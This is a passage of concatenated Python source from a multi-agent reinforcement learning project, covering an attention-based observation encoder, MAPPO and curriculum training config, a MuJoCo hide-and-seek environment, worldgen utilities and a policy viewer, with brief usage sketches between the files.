emb_good.append(inputs[:, good_offset+2*i:good_offset+2*(i+1)])
landmark_offset = 4 + 2*(adv_num-1) + 2*good_num
for i in range(landmark_num):
emb_landmark.append(inputs[:, landmark_offset+3*i:landmark_offset+3*(i+1)])
emb_adv = torch.stack(emb_adv,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_adv = self.adv_encoder(emb_adv)
beta_adv = torch.matmul(beta_adv_ij, emb_adv.permute(0,2,1)).squeeze(1)
emb_good = torch.stack(emb_good,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_good = self.good_encoder(emb_good)
beta_good = torch.matmul(beta_good_ij, emb_good.permute(0,2,1)).squeeze(1)
emb_landmark = torch.stack(emb_landmark,dim = 1) #(batch_size,n_agents-1,eb_dim)
emb_landmark = self.landmark_encoder(emb_landmark)
beta_landmark = torch.matmul(beta_landmark_ij, emb_landmark.permute(0,2,1)).squeeze(1)
alpha_adv = F.softmax(beta_adv,dim = 1).unsqueeze(2)
alpha_good = F.softmax(beta_good,dim = 1).unsqueeze(2)
alpha_landmark = F.softmax(beta_landmark,dim = 1).unsqueeze(2)
adv_vi = torch.mul(alpha_adv,emb_adv)
adv_vi = torch.sum(adv_vi,dim=1)
good_vi = torch.mul(alpha_good,emb_good)
good_vi = torch.sum(good_vi,dim=1)
landmark_vi = torch.mul(alpha_landmark,emb_landmark)
landmark_vi = torch.sum(landmark_vi,dim=1)
gi = self.fc(emb_self)
f = self.encoder_linear(torch.cat([gi, adv_vi, good_vi, landmark_vi], dim=1))
return f
```
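A minimal construction sketch for the actor/critic pair above. It assumes the repository's `utils.distributions` and `utils.util` modules are importable, and the observation width follows the `simple_spread` layout that `ObsEncoder_sp` expects (4 self features, 3 per landmark, 2 per other agent); the batch size and the `Discrete(5)` stand-in are arbitrary:
```python
import torch
from types import SimpleNamespace

num_agents = 3
obs_dim = 4 + 3 * num_agents + 2 * (num_agents - 1)   # 17 for 3 agents
action_space = SimpleNamespace(n=5)                    # stand-in for a gym Discrete(5) space

actor = ATTBase_actor(obs_dim, action_space, num_agents, model_name='simple_spread')
critic = ATTBase_critic(obs_dim, num_agents, model_name='simple_spread')

obs = torch.randn(8, obs_dim)                          # per-agent observations
share_obs = torch.randn(8, obs_dim * num_agents)       # concatenated team observation
dist = actor(obs, num_agents)
action = dist.sample()
value, _, _ = critic(share_obs, obs, num_agents, None, None)
print(action.shape, value.shape)
```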
#### File: jiayu-ch15/curriculum/config.py
```python
import argparse
def get_config():
# get the parameters
parser = argparse.ArgumentParser(description='MAPPO-sc.')
# prepare
parser.add_argument("--algorithm_name", type=str, default='mappo')
parser.add_argument("--load_algorithm_name", type=str, default='mappo')
parser.add_argument("--seed", type=int, default=1)
parser.add_argument("--cuda", action='store_false', default=True)
parser.add_argument("--cuda_deterministic", action='store_false', default=True)
parser.add_argument("--n_training_threads", type=int, default=12)
parser.add_argument("--n_rollout_threads", type=int, default=32)
parser.add_argument("--num_env_steps", type=int, default=10e6, help='number of environment steps to train (default: 10e6)')
# env
parser.add_argument("--env_name", type=str, default='batch1')
parser.add_argument("--load_num_agents", type=int, default=3)
parser.add_argument("--num_agents", type=int, default=3)
parser.add_argument("--share_reward", action='store_false', default=True)
# hanabi
parser.add_argument("--hanabi_name", type=str, default='Hanabi-Full-Minimal')
# mpe
parser.add_argument("--scenario_name", type=str, default='simple_spread')
parser.add_argument("--num_landmarks", type=int, default=3)
parser.add_argument("--num_good_agents", type=int, default=3)
parser.add_argument("--num_adversaries", type=int, default=1)
# evaluation
parser.add_argument("--historical_length", type=int, default=5)
# starcraft2
parser.add_argument("--map_name", type=str, default='3m')
# hide and seek
parser.add_argument("--task_type", type=str, default='all')
parser.add_argument("--num_seekers", type=int, default=1)
parser.add_argument("--num_hiders", type=int, default=1)
parser.add_argument("--num_boxes", type=int, default=1)
parser.add_argument("--num_ramps", type=int, default=1)
parser.add_argument("--num_food", type=int, default=0)
parser.add_argument("--floor_size", type=float, default=6.0)
parser.add_argument("--grid_size", type=int, default=30)
parser.add_argument("--fixed_door", action='store_false', default=True)
parser.add_argument("--spawn_obs", action='store_true', default=False)
parser.add_argument("--env_horizon", type=int, default=30)
# network
parser.add_argument("--share_policy", action='store_false', default=True, help='agent share the same policy')
parser.add_argument("--hidden_size", type=int, default=64)
parser.add_argument("--layer_N", type=int, default=1)
parser.add_argument("--use_ReLU", action='store_true', default=False)
parser.add_argument("--use_common_layer", action='store_true', default=False)
parser.add_argument("--use_popart", action='store_false', default=True)
parser.add_argument("--use_feature_popart", action='store_true', default=False)
parser.add_argument("--use_feature_normlization", action='store_true', default=False)
parser.add_argument("--use_orthogonal", action='store_false', default=True)
parser.add_argument("--multi_critic", action='store_true', default=False)
parser.add_argument("--critic_k", type=int, default=3)
# lstm
parser.add_argument("--naive_recurrent_policy", action='store_true', default=False, help='use a naive recurrent policy')
parser.add_argument("--recurrent_policy", action='store_false', default=True, help='use a recurrent policy')
parser.add_argument("--data_chunk_length", type=int, default=10)
parser.add_argument("--critic_full_obs", action='store_true', default=False)
# attn
parser.add_argument("--attn", action='store_true', default=False)
parser.add_argument("--attn_N", type=int, default=1)
parser.add_argument("--attn_size", type=int, default=64)
parser.add_argument("--attn_heads", type=int, default=4)
parser.add_argument("--dropout", type=float, default=0.0)
parser.add_argument("--use_average_pool", action='store_false', default=True)
# ppo
parser.add_argument("--ppo_epoch", type=int, default=15, help='number of ppo epochs (default: 4)')
parser.add_argument("--use_clipped_value_loss", action='store_false', default=True)
parser.add_argument("--clip_param", type=float, default=0.2, help='ppo clip parameter (default: 0.2)')
parser.add_argument("--num_mini_batch", type=int, default=1, help='number of batches for ppo (default: 32)')
parser.add_argument("--entropy_coef", type=float, default=0.01, help='entropy term coefficient (default: 0.01)')
parser.add_argument("--value_loss_coef", type=float, default=1, help='value loss coefficient (default: 0.5)')
parser.add_argument("--lr", type=float, default=5e-4, help='learning rate (default: 7e-4)')
parser.add_argument("--eps", type=float, default=1e-5, help='RMSprop optimizer epsilon (default: 1e-5)')
parser.add_argument("--weight_decay", type=float, default=0)
parser.add_argument("--use-max-grad-norm", action='store_true', default=False)
parser.add_argument("--max-grad-norm", type=float, default=20.0, help='max norm of gradients (default: 0.5)')
parser.add_argument("--use-gae", action='store_false', default=True, help='use generalized advantage estimation')
parser.add_argument("--gamma", type=float, default=0.99, help='discount factor for rewards (default: 0.99)')
parser.add_argument("--gae-lambda", type=float, default=0.95, help='gae lambda parameter (default: 0.95)')
parser.add_argument("--use-proper-time-limits", action='store_true', default=False, help='compute returns taking into account time limits')
parser.add_argument("--use_huber_loss", action='store_false', default=True)
parser.add_argument("--huber_delta", type=float, default=10.0)
parser.add_argument("--use_accumulate_grad", action='store_true', default=False)
parser.add_argument("--use_grad_average", action='store_true', default=False)
# replay buffer
parser.add_argument("--episode_length", type=int, default=200, help='number of forward steps in A2C (default: 5)')
parser.add_argument("--test_episode_length", type=int, default=200, help='number of forward steps in A2C (default: 5)')
# amigo
parser.add_argument("--teacher_entropy_coef", type=float, default=0.01, help='entropy term coefficient (default: 0.01)')
parser.add_argument("--teacher_lr", type=float, default=1e-3, help='learning rate (default: 7e-4)')
parser.add_argument("--episode_length_teacher", type=int, default=200, help='number of teacher steps')
parser.add_argument("--teacher_hidden_size", type=int, default=64)
# run
parser.add_argument("--use-linear-lr-decay", action='store_true', default=False, help='use a linear schedule on the learning rate')
# save
parser.add_argument("--save_interval", type=int, default=10)
# log
parser.add_argument("--log_interval", type=int, default=1)
# eval
parser.add_argument("--eval", action='store_true', default=False)
parser.add_argument("--eval_interval", type=int, default=1)
parser.add_argument("--eval_episodes", type=int, default=32)
# render
parser.add_argument("--save_gifs", action='store_true', default=False)
parser.add_argument("--ifi", type=float, default=0.333333)
parser.add_argument("--model_dir", type=str, default=None)
# variational curriculum learning
parser.add_argument("--del_switch", type=str, default='novelty', help="novelty means diversified, old means FIFO, random means random del")
parser.add_argument("--buffer_length", type=int, default=2000)
parser.add_argument("--h", type=float, default=1.0, help="h in the RBFkernel")
parser.add_argument("--epsilon", type=float, default=0.6, help="uniform noise")
parser.add_argument("--delta", type=float, default=0.6, help="gradient step")
parser.add_argument('--sol_prop', type=float, default=0.05, help="proportion of solved samples")
parser.add_argument('--B_exp', type=int, default=150, help="number of Bexp")
    parser.add_argument('--Rmin', type=float, default=0.5, help="the lower bound of V")
    parser.add_argument('--Rmax', type=float, default=0.95, help="the upper bound of V")
parser.add_argument('--fixed_interval', type=int, default=3, help='fixed episodes for training tasks')
parser.add_argument('--save_node',action='store_true', default=False)
parser.add_argument('--save_node_interval', type=int, default=10)
parser.add_argument('--archive_initial_length', type=int, default=1000)
parser.add_argument('--eval_number', type=int, default=1)
# entity progression
    parser.add_argument('--threshold_next', type=float, default=0.9, help='threshold for next phase')
    parser.add_argument('--decay_interval', type=int, default=30, help='decay the ratio of the last phase')
parser.add_argument("--num_target", type=int, default=8, help='num_agents of the final phase')
# wandb
parser.add_argument('--use_wandb',action='store_true', default=False)
args = parser.parse_args()
return args
```
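A quick sanity-check sketch: `get_config()` parses `sys.argv`, so override it to simulate a command line (the flag values below are arbitrary):
```python
import sys

sys.argv = ['train.py', '--scenario_name', 'simple_spread', '--num_agents', '4', '--seed', '7']
args = get_config()
print(args.scenario_name, args.num_agents, args.seed)   # simple_spread 4 7
```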
#### File: hns/envs/base.py
```python
import numpy as np
import logging
from mujoco_worldgen import Floor, WorldBuilder, WorldParams, Env
from envs.hns.wrappers.multi_agent import (SplitMultiAgentActions, SplitObservations,
SelectKeysWrapper)
from envs.hns.wrappers.util import DiscretizeActionWrapper, DiscardMujocoExceptionEpisodes
from envs.hns.wrappers.line_of_sight import AgentAgentObsMask2D
from envs.hns.modules.agents import Agents
from envs.hns.modules.walls import RandomWalls
from envs.hns.modules.objects import Boxes, Ramps
class Base(Env):
'''
Multi-agent Base Environment.
Args:
horizon (int): Number of steps agent gets to act
n_substeps (int): Number of internal mujoco steps per outer environment step;
essentially this is action repeat.
n_agents (int): number of agents in the environment
floor_size (float): size of the floor
grid_size (int): size of the grid that we'll use to place objects on the floor
action_lims (float tuple): lower and upper limit of mujoco actions
deterministic_mode (bool): if True, seeds are incremented rather than randomly sampled.
'''
def __init__(self, horizon=250, n_substeps=5, n_agents=2,
floor_size=6., grid_size=30,
action_lims=(-1.0, 1.0), deterministic_mode=False,
**kwargs):
super().__init__(get_sim=self._get_sim,
get_obs=self._get_obs,
action_space=tuple(action_lims),
horizon=horizon,
deterministic_mode=deterministic_mode)
self.n_agents = n_agents
self.metadata = {}
self.metadata['n_actors'] = n_agents
self.horizon = horizon
self.n_substeps = n_substeps
self.floor_size = floor_size
self.grid_size = grid_size
self.kwargs = kwargs
self.placement_grid = np.zeros((grid_size, grid_size))
self.modules = []
def add_module(self, module):
self.modules.append(module)
def _get_obs(self, sim):
'''
Loops through modules, calls their observation_step functions, and
adds the result to the observation dictionary.
'''
obs = {}
for module in self.modules:
obs.update(module.observation_step(self, self.sim))
# print('obs: ',obs)
return obs
def _get_sim(self, seed):
'''
Calls build_world_step and then modify_sim_step for each module. If
a build_world_step failed, then restarts.
'''
world_params = WorldParams(size=(self.floor_size, self.floor_size, 2.5),
num_substeps=self.n_substeps)
successful_placement = False
failures = 0
while not successful_placement:
if (failures + 1) % 10 == 0:
logging.warning(f"Failed {failures} times in creating environment")
builder = WorldBuilder(world_params, seed)
floor = Floor()
builder.append(floor)
self.placement_grid = np.zeros((self.grid_size, self.grid_size))
# successful_placement = np.all([module.build_world_step(self, floor, self.floor_size)
# for module in self.modules])
tmp_successful_placement = [module.build_world_step(self, floor, self.floor_size)
for module in self.modules]
successful_placement = np.all(tmp_successful_placement)
failures += 1
sim = builder.get_sim()
for module in self.modules:
module.modify_sim_step(self, sim)
return sim
def make_env(n_substeps=5, horizon=250, deterministic_mode=False, n_agents=2,
n_boxes=2, n_ramps=1):
'''
This make_env function is not used anywhere; it exists to provide a simple, bare-bones
example of how to construct a multi-agent environment using the modules framework.
'''
env = Base(n_agents=n_agents, n_substeps=n_substeps, horizon=horizon,
deterministic_mode=deterministic_mode)
env.add_module(RandomWalls(grid_size=30, num_rooms=4, min_room_size=6, door_size=2))
if n_boxes > 0:
env.add_module(Boxes(n_boxes=n_boxes))
if n_ramps > 0:
env.add_module(Ramps(n_ramps=n_ramps))
env.add_module(Agents(n_agents))
env.reset()
keys_self = ['agent_qpos_qvel']
keys_mask_self = ['mask_aa_obs']
keys_external = ['agent_qpos_qvel']
keys_mask_external = []
env = SplitMultiAgentActions(env)
env = DiscretizeActionWrapper(env, 'action_movement')
env = AgentAgentObsMask2D(env)
env = SplitObservations(env, keys_self + keys_mask_self)
env = SelectKeysWrapper(env, keys_self=keys_self,
keys_external=keys_external,
keys_mask=keys_mask_self + keys_mask_external,
flatten=False)
env = DiscardMujocoExceptionEpisodes(env)
return env
```
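A minimal usage sketch of the bare-bones `make_env` above; it assumes MuJoCo and `mujoco_worldgen` are installed and the `envs.hns` package is importable:
```python
env = make_env(n_agents=2, n_boxes=2, n_ramps=1, horizon=100)
obs = env.reset()
print(env.metadata['n_actors'])   # 2
print(sorted(obs.keys()))         # per-agent observation keys kept by SelectKeysWrapper
```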
#### File: mujoco-worldgen/bin/examine.py
```python
import click
import logging
from mujoco_worldgen.util.envs import EnvViewer, examine_env
from mujoco_worldgen.util.path import worldgen_path
from mujoco_worldgen.util.parse_arguments import parse_arguments
logger = logging.getLogger(__name__)
# For more detail on the argv format, please have a look at the
# docstring below.
@click.command()
@click.argument('argv', nargs=-1, required=False)
def main(argv):
'''
examine.py is used to display environments
Example uses:
bin/examine.py simple_particle
bin/examine.py examples/particle_gather.py
bin/examine.py particle_gather n_food=5 floorsize=5
bin/examine.py example_env_examine.jsonnet
'''
env_names, env_kwargs = parse_arguments(argv)
assert len(env_names) == 1, 'You must provide exactly 1 environment to examine.'
env_name = env_names[0]
examine_env(env_name, env_kwargs,
core_dir=worldgen_path(), envs_dir='examples', xmls_dir='xmls',
env_viewer=EnvViewer)
print(main.__doc__)
if __name__ == '__main__':
logging.getLogger('').handlers = []
logging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)
main()
```
#### File: mujoco_worldgen/util/path.py
```python
from os.path import abspath, dirname, join
WORLDGEN_ROOT_PATH = abspath(join(dirname(__file__), '..', '..'))
def worldgen_path(*args):
"""
Returns an absolute path from a path relative to the mujoco_worldgen repository
root directory.
"""
return join(WORLDGEN_ROOT_PATH, *args)
```
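For illustration, `worldgen_path` simply joins relative segments onto the repository root (the example file name below is hypothetical):
```python
print(worldgen_path())                                   # absolute repository root
print(worldgen_path('examples', 'particle_gather.py'))   # <root>/examples/particle_gather.py
```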
#### File: mujoco_worldgen/util/types.py
```python
import functools
import inspect
import types
def enforce_is_callable(var, error_msg):
"""
Raises an exception with provided error_msg if the variable
is not a callable.
"""
if not callable(var):
raise TypeError(error_msg)
return var
def extract_top_level_class(module, subclass):
'''
    Searches module for a top-level class (in terms of inheritance)
of type subclass.
:param module: module in which we search for subclass
:param subclass: subclass that we search for
:return: object of type subclass.
'''
extracted_classes = []
for key, value in module.items():
        if isinstance(value, type) and issubclass(value, subclass):
extracted_classes.append([key, value, 0])
# Get the class which is the most top level.
assert len(extracted_classes) > 0, "Couldn't extract %s from module: %s" % (subclass, module)
top_level = extracted_classes[0]
for i in range(len(extracted_classes)):
for j in range(len(extracted_classes)):
if issubclass(extracted_classes[i][1], extracted_classes[j][1]):
extracted_classes[i][2] += 1
if extracted_classes[i][2] > top_level[2]:
top_level = extracted_classes[i]
return top_level[1]
def extract_matching_arguments(fun, kwargs):
# Extracts subset of kwargs that contains arguments present in signature of fun.
assert callable(fun), "First argument to extract_matching_arguments should be a function."
    assert isinstance(kwargs, dict), "Second argument to extract_matching_arguments should be a dictionary of arguments"
fun_handler = fun
while hasattr(fun_handler, "__wrapped__") or inspect.isclass(fun_handler):
if hasattr(fun_handler, "__wrapped__"):
fun_handler = fun_handler.__wrapped__
if inspect.isclass(fun_handler):
fun_handler = fun_handler.__init__
spec = inspect.getfullargspec(fun_handler)
fun_args = []
if spec.args is not None:
fun_args += spec.args
if spec.kwonlyargs is not None:
fun_args += spec.kwonlyargs
# function accepts kwargs. Therefore, we pass all arguments.
if spec.varkw is not None:
args_to_pass = kwargs
args_remaining = {}
else:
args_to_pass = dict([(k, v) for k, v in kwargs.items() if k in fun_args])
args_remaining = dict([(k, v) for k, v in kwargs.items() if k not in fun_args])
return args_to_pass, args_remaining
def store_args(method):
"""Stores provided method args as instance attributes."""
argspec = inspect.getfullargspec(method)
defaults = {}
if argspec.defaults is not None:
defaults = dict(
zip(argspec.args[-len(argspec.defaults):], argspec.defaults))
if argspec.kwonlydefaults is not None:
defaults.update(argspec.kwonlydefaults)
arg_names = argspec.args[1:]
@functools.wraps(method)
def wrapper(*positional_args, **keyword_args):
self = positional_args[0]
# Get default arg values
args = defaults.copy()
# Add provided arg values
list(
map(args.update, (zip(arg_names, positional_args[1:]), keyword_args.items())))
# Store values in instance as attributes
self.__dict__.update(args)
return method(*positional_args, **keyword_args)
return wrapper
class Maybe(type):
''' Metaclass to match types with optionally none. Use maybe() instead '''
maybe_type = type(None) # Overridden in derived classes
def __instancecheck__(self, instance):
return isinstance(instance, self.maybe_type) or instance is None
def __repr__(self):
return "<class Maybe({})>".format(self.maybe_type)
def maybe(arg_type):
'''
Helper for @accepts and @returns decorator. Maybe means optionally None.
Example:
@accepts(maybe(int), str, maybe(dict))
def foo(a, b, c):
# a - can be int or None
# b - must be str
# c - can be dict or None
See: https://wiki.haskell.org/Maybe
'''
class Derived(metaclass=Maybe):
maybe_type = arg_type
return Derived
# Copied from
# http://pythoncentral.io/validate-python-function-parameters-and-return-types-with-decorators/
def accepts(*accepted_arg_types):
'''
A decorator to validate the parameter types of a given function.
It is passed a tuple of types. eg. (<type 'tuple'>, <type 'int'>)
Note: It doesn't do a deep check, for example checking through a
tuple of types. The argument passed must only be types.
See also the maybe(), used for types that are optionally None.
'''
def accept_decorator(validate_function):
''' Do not call this function directly! Use @accepts(...) instead! '''
# Check if the number of arguments to the validator
# function is the same as the arguments provided
# to the actual function to validate. We don't need
# to check if the function to validate has the right
# amount of arguments, as Python will do this
# automatically (also with a TypeError).
@functools.wraps(validate_function)
def decorator_wrapper(*function_args, **function_args_dict):
            if len(function_args) != len(accepted_arg_types):
raise InvalidArgumentNumberError(validate_function.__name__)
# We're using enumerate to get the index, so we can pass the
# argument number with the incorrect type to
# ArgumentValidationError.
for arg_num, (actual_arg, accepted_arg_type) in enumerate(zip(function_args, accepted_arg_types)):
if not isinstance(actual_arg, accepted_arg_type):
ord_num = _ordinal(arg_num + 1)
raise ArgumentValidationError(ord_num,
validate_function.__name__,
accepted_arg_type)
return validate_function(*function_args, **function_args_dict)
return decorator_wrapper
return accept_decorator
def returns(*accepted_return_type_tuple):
'''
Validates the return type. Since there's only ever one
return type, this makes life simpler. Along with the
accepts() decorator, this also only does a check for
the top argument. For example you couldn't check
(<type 'tuple'>, <type 'int'>, <type 'str'>).
In that case you could only check if it was a tuple.
See also maybe() for optionally returning a type or None
'''
def return_decorator(validate_function):
''' Do not call this function directly! Use @returns(...) instead ! '''
# No return type has been specified.
if len(accepted_return_type_tuple) == 0:
raise TypeError('You must specify a return type.')
@functools.wraps(validate_function)
def decorator_wrapper(*function_args, **function_args_dict):
# More than one return type has been specified.
if len(accepted_return_type_tuple) > 1:
raise TypeError('You must specify one return type.')
# Since the decorator receives a tuple of arguments
            # and there is only ever one object returned, we'll just
# grab the first parameter.
accepted_return_type = accepted_return_type_tuple[0]
# We'll execute the function, and
# take a look at the return type.
return_value = validate_function(*function_args, **function_args_dict)
return_value_type = type(return_value)
            if not isinstance(return_value, accepted_return_type):
raise InvalidReturnType(return_value_type,
validate_function.__name__)
return return_value
return decorator_wrapper
return return_decorator
def _ordinal(num):
'''
Returns the ordinal number of a given integer, as a string.
eg. 1 -> 1st, 2 -> 2nd, 3 -> 3rd, etc.
'''
if 10 <= num % 100 < 20:
return '{0}th'.format(num)
else:
ord = {1: 'st', 2: 'nd', 3: 'rd'}.get(num % 10, 'th')
return '{0}{1}'.format(num, ord)
class ArgumentValidationError(ValueError):
'''
Raised when the type of an argument to a function is not what it should be.
'''
def __init__(self, arg_num, func_name, accepted_arg_type):
self.error = 'The {0} argument of {1}() is not a {2}'.format(arg_num,
func_name,
accepted_arg_type)
def __str__(self):
return self.error
class InvalidArgumentNumberError(ValueError):
'''
Raised when the number of arguments supplied to a function is incorrect.
Note that this check is only performed from the number of arguments
specified in the validate_accept() decorator. If the validate_accept()
call is incorrect, it is possible to have a valid function where this
will report a false validation.
'''
def __init__(self, func_name):
self.error = 'Invalid number of arguments for {0}()'.format(func_name)
def __str__(self):
return self.error
class InvalidReturnType(ValueError):
'''
As the name implies, the return value is the wrong type.
'''
def __init__(self, return_type, func_name):
self.error = 'Invalid return type {0} for {1}()'.format(return_type,
func_name)
def __str__(self):
return self.error
```
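A short usage sketch of the decorators defined above (`maybe`, `@accepts`, `@returns`); the two functions are made up for illustration:
```python
@accepts(maybe(int), str)
def label(count, name):
    # count may be an int or None; name must be a str
    return name if count is None else "{} x{}".format(name, count)

@returns(str)
def greet(name):
    return "hello " + name

print(label(None, "box"))   # box
print(label(3, "ramp"))     # ramp x3
print(greet("world"))       # hello world
```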
#### File: hns/viewer/policy_viewer.py
```python
import time
import glfw
import numpy as np
from operator import itemgetter
from mujoco_py import const, MjViewer
from mujoco_worldgen.util.types import store_args
from envs.hns.ma_policy.util import listdict2dictnp
from functools import reduce
import pdb
import torch
import copy
def handle_dict_obs(keys, order_obs, mask_order_obs, dict_obs, num_agents, num_hiders):
# obs = []
# share_obs = []
for i, key in enumerate(order_obs):
if key in keys:
if mask_order_obs[i] == None:
temp_share_obs = dict_obs[key].reshape(num_agents,-1).copy()
temp_obs = temp_share_obs.copy()
else:
temp_share_obs = dict_obs[key].reshape(num_agents,-1).copy()
temp_mask = dict_obs[mask_order_obs[i]].copy()
temp_obs = dict_obs[key].copy()
mins_temp_mask = ~temp_mask
temp_obs[mins_temp_mask]=np.zeros((mins_temp_mask.sum(),temp_obs.shape[2]))
temp_obs = temp_obs.reshape(num_agents,-1)
if i == 0:
reshape_obs = temp_obs.copy()
reshape_share_obs = temp_share_obs.copy()
else:
reshape_obs = np.concatenate((reshape_obs,temp_obs),axis=1)
reshape_share_obs = np.concatenate((reshape_share_obs,temp_share_obs),axis=1)
# obs.append(reshape_obs)
# share_obs.append(reshape_share_obs)
# obs = np.array(obs)[:,num_hiders:]
# share_obs = np.array(share_obs)[:,num_hiders:]
obs = reshape_obs[num_hiders:]
share_obs = reshape_share_obs[num_hiders:]
return obs, share_obs
def splitobs(obs, keepdims=True):
'''
Split obs into list of single agent obs.
Args:
obs: dictionary of numpy arrays where first dim in each array is agent dim
'''
n_agents = obs[list(obs.keys())[0]].shape[0]
return [{k: v[[i]] if keepdims else v[i] for k, v in obs.items()} for i in range(n_agents)]
class PolicyViewer(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.ob = env.reset()
for policy in self.policies:
policy.reset()
assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
while self.duration is None or time.time() < self.end_time:
if len(self.policies) == 1:
action, _ = self.policies[0].act(self.ob)
else:
self.ob = splitobs(self.ob, keepdims=False)
ob_policy_idx = np.split(np.arange(len(self.ob)), len(self.policies))
actions = []
for i, policy in enumerate(self.policies):
inp = itemgetter(*ob_policy_idx[i])(self.ob)
inp = listdict2dictnp([inp] if ob_policy_idx[i].shape[0] == 1 else inp)
ac, info = policy.act(inp)
actions.append(ac)
action = listdict2dictnp(actions, keepdims=True)
self.ob, rew, done, env_info = self.env.step(action)
self.total_rew += rew
if done or env_info.get('discard_episode', False):
self.reset_increment()
if self.display_window:
self.add_overlay(const.GRID_TOPRIGHT, "Reset env; (current seed: {})".format(self.seed), "N - next / P - previous ")
self.add_overlay(const.GRID_TOPRIGHT, "Reward", str(self.total_rew))
if hasattr(self.env.unwrapped, "viewer_stats"):
for k, v in self.env.unwrapped.viewer_stats.items():
self.add_overlay(const.GRID_TOPRIGHT, k, str(v))
self.env.render()
def reset_increment(self):
self.total_rew_avg = (self.n_episodes * self.total_rew_avg + self.total_rew) / (self.n_episodes + 1)
self.n_episodes += 1
print(f"Reward: {self.total_rew} (rolling average: {self.total_rew_avg})")
self.total_rew = 0.0
self.seed += 1
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
class PolicyViewer_hs_single(MjViewer):
'''
PolicyViewer runs a policy with an environment and optionally displays it.
env - environment to run policy in
policy - policy object to run
display_window - if true, show the graphical viewer
seed - environment seed to view
duration - time in seconds to run the policy, run forever if duration=None
'''
@store_args
def __init__(self, all_args, env, policies, display_window=True, seed=None, duration=None):
if seed is None:
self.seed = env.seed()[0]
else:
self.seed = seed
env.seed(seed)
self.total_rew = 0.0
self.dict_obs = env.reset()
#for policy in self.policies:
# policy.reset()
assert env.metadata['n_actors'] % len(policies) == 0
if hasattr(env, "reset_goal"):
self.goal = env.reset_goal()
super().__init__(self.env.unwrapped.sim)
# TO DO: remove circular dependency on viewer object. It looks fishy.
self.env.unwrapped.viewer = self
if self.render and self.display_window:
self.env.render()
def key_callback(self, window, key, scancode, action, mods):
super().key_callback(window, key, scancode, action, mods)
# Trigger on keyup only:
if action != glfw.RELEASE:
return
# Increment experiment seed
if key == glfw.KEY_N:
self.reset_increment()
# Decrement experiment trial
elif key == glfw.KEY_P:
print("Pressed P")
self.seed = max(self.seed - 1, 0)
self.env.seed(self.seed)
self.ob = self.env.reset()
for policy in self.policies:
policy.reset()
if hasattr(self.env, "reset_goal"):
self.goal = self.env.reset_goal()
self.update_sim(self.env.unwrapped.sim)
def run(self):
self.action_movement_dim = []
'''
self.order_obs = ['agent_qpos_qvel','box_obs','ramp_obs','food_obs','observation_self']
self.mask_order_obs = ['mask_aa_obs','mask_ab_obs','mask_ar_obs','mask_af_obs',None]
'''
# self.order_obs = ['agent_qpos_qvel', 'box_obs','ramp_obs','construction_site_obs','vector_door_obs', 'observation_self']
# self.mask_order_obs = ['mask_aa_obs', 'mask_ab_obs','mask_ar_obs',None,None,None]
self.order_obs = ['agent_qpos_qvel', 'box_obs','ramp_obs','construction_site_obs', 'observation_self']
self.mask_order_obs = [None,None,None,None,None]
self.keys = self.env.observation_space.spaces.keys()
self.num_agents = 2
self.num_hiders = 1
self.num_seekers = 1
for agent_id in range(self.num_agents):
# deal with dict action space
action_movement = self.env.action_space['action_movement'][agent_id].nvec
self.action_movement_dim.append(len(action_movement))
self.masks = np.ones((1, self.num_agents, 1)).astype(np.float32)
if self.duration is not None:
self.end_time = time.time() + self.duration
self.total_rew_avg = 0.0
self.n_episodes = 0
self.obs = []
self.share_obs = []
reshape_obs, reshape_share_obs = handle_dict_obs(self.keys, self.order_obs, self.mask_order_obs, self.dict_obs, self.num_agents, self.num_hiders)
self.obs.append(reshape_obs)
self.share_obs.append(reshape_share_obs)
self.obs = np.array(self.obs).astype(np.float32)
self.share_obs = np.array(self.share_obs).astype(np.float32)
self.recurrent_hidden_states = np.zeros((1, self.num_agents, 64)).astype(np.float32)
self.recurrent_hidden_states_critic = np.zeros((1, self.num_agents, 64)).astype(np.float32)
while self.duration is None or time.time() < self.end_time:
values = []
actions= []
recurrent_hidden_statess = []
recurrent_hidden_statess_critic = []
with torch.no_grad():
for agent_id in range(self.num_seekers):
self.policies[0].eval()
value, action, action_log_prob, recurrent_hidden_states, recurrent_hidden_states_critic = self.policies[0].act(agent_id,
torch.tensor(self.share_obs[:,agent_id,:]),
torch.tensor(self.obs[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states[:,agent_id,:]),
torch.tensor(self.recurrent_hidden_states_critic[:,agent_id,:]),
torch.tensor(self.masks[:,agent_id,:]))
values.append(value.detach().cpu().numpy())
actions.append(action.detach().cpu().numpy())
recurrent_hidden_statess.append(recurrent_hidden_states.detach().cpu().numpy())
recurrent_hidden_statess_critic.append(recurrent_hidden_states_critic.detach().cpu().numpy())
# rearrange action
action_movement = []
action_pull = []
action_glueall = []
for k in range(self.num_hiders):
                #action_movement.append(np.random.randint(11, size=3)) # hiders take a random walk
                action_movement.append(np.array([5,5,5])) # hiders stay still
action_pull.append(0)
action_glueall.append(0)
for k in range(self.num_seekers):
action_movement.append(actions[k][0][:3])
                action_pull.append(int(actions[k][0][3]))
                action_glueall.append(int(actions[k][0][4]))
